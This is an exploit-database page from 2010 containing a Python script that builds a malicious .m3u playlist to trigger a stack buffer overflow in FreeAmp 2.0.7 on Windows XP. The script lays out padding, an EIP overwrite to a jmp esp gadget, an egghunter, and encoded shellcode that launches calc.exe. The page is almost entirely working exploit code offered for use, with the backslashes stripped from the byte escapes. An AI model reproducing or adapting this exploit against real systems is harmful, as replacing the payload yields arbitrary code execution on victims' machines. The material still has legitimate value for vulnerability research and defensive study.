[local exploits] - FreeAmp 2.0.7 .m3u Buffer Overflow

Posted on 11 December 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>FreeAmp 2.0.7 .m3u Buffer Overflow | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='FreeAmp 2.0.7 .m3u Buffer Overflow by zota in local exploits | Inj3ct0r 1337 - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_setDomainName", "none"]);_gaq.push(["_setAllowLinker", true]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>==================================
FreeAmp 2.0.7 .m3u Buffer Overflow
==================================

# Exploit Title: FreeAmp 2.0.7 .m3u Buffer Overflow - Egghunter
# Google Dork: N/A
# Date: 11/12/2010
# Author: zota (Thanks to Andrew; andras.kabai@cert-hungary.hu)
# Software Link: http://letoltes.szoftverbazis.hu/bfc5ec1d5e80cee5b5d3f78459113ed93c51f649/4d03800a/freeamp-v2-0-7-JI2/freeampsetup_2_0_7.exe
# Version: 2.0.7
# Tested on: Windows XP SP3 HUN
# CVE : N/A
 
 
filename = &quot;crash.m3u&quot;
 
egg = &quot;H4CK&quot;
 
#egghunter --&gt; size 32 byte
 
egghunter = &quot;x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74xefxb8x48x34x43x4bx8bxfaxafx75xeaxafx75xe7xffxe7&quot;
 
padding = &quot;A&quot; * 14654
 
#kernel32.dll
#7c86467b   --&gt; jmp esp
 
eip = &quot;x7bx46x86x7c&quot;
 
# 16 byte nop after eip
nop= &quot;C&quot; * 16
 
 
#msfpayload windows/exec CMD=calc.exe r | msfencode -b &quot;x00x0ax0d --&gt; size 228 byte&quot;
 
payload = (
&quot;xdbxcfxd9x74x24xf4xbaxf0x1bxe7xdbx5bx31xc9&quot; +
&quot;xb1x33x31x53x18x03x53x18x83xc3xf4xf9x12x27&quot; +
&quot;x1cx74xdcxd8xdcxe7x54x3dxedx35x02x35x5fx8a&quot; +
&quot;x40x1bx53x61x04x88xe0x07x81xbfx41xadxf7x8e&quot; +
&quot;x52x03x38x5cx90x05xc4x9fxc4xe5xf5x6fx19xe7&quot; +
&quot;x32x8dxd1xb5xebxd9x43x2ax9fx9cx5fx4bx4fxab&quot; +
&quot;xdfx33xeax6cxabx89xf5xbcx03x85xbex24x28xc1&quot; +
&quot;x1ex54xfdx11x62x1fx8axe2x10x9ex5ax3bxd8x90&quot; +
&quot;xa2x90xe7x1cx2fxe8x20x9axcfx9fx5axd8x72x98&quot; +
&quot;x98xa2xa8x2dx3dx04x3bx95xe5xb4xe8x40x6dxba&quot; +
&quot;x45x06x29xdfx58xcbx41xdbxd1xeax85x6dxa1xc8&quot; +
&quot;x01x35x72x70x13x93xd5x8dx43x7bx8ax2bx0fx6e&quot; +
&quot;xdfx4ax52xe5x1exdexe8x40x20xe0xf2xe2x48xd1&quot; +
&quot;x79x6dx0fxeexabxc9xffxa4xf6x78x97x60x63x39&quot; +
&quot;xfax92x59x7ex02x11x68xffxf1x09x19xfaxbex8d&quot; +
&quot;xf1x76xafx7bxf6x25xd0xa9x95xa8x42x31x74x4e&quot; +
&quot;xe2xd0x88x9a&quot;)
 
buffer = padding + egg + egg + payload + &quot;A&quot; * (14907 - len(padding) - len(egg) - len(egg) -len(payload)) + eip + nop + egghunter + &quot;D&quot; * (15000 - 14907 - len(egg) - len(nop) - len(egghunter))
 
textfile = open(filename,&#039;w&#039;)
textfile.write(buffer)
textfile.close()


# <a href='http://1337db.com/'>1337db.com</a> [2010-12-11]</pre></body></html>
TOP
Malware :

Last 20
Exploits :

Last 20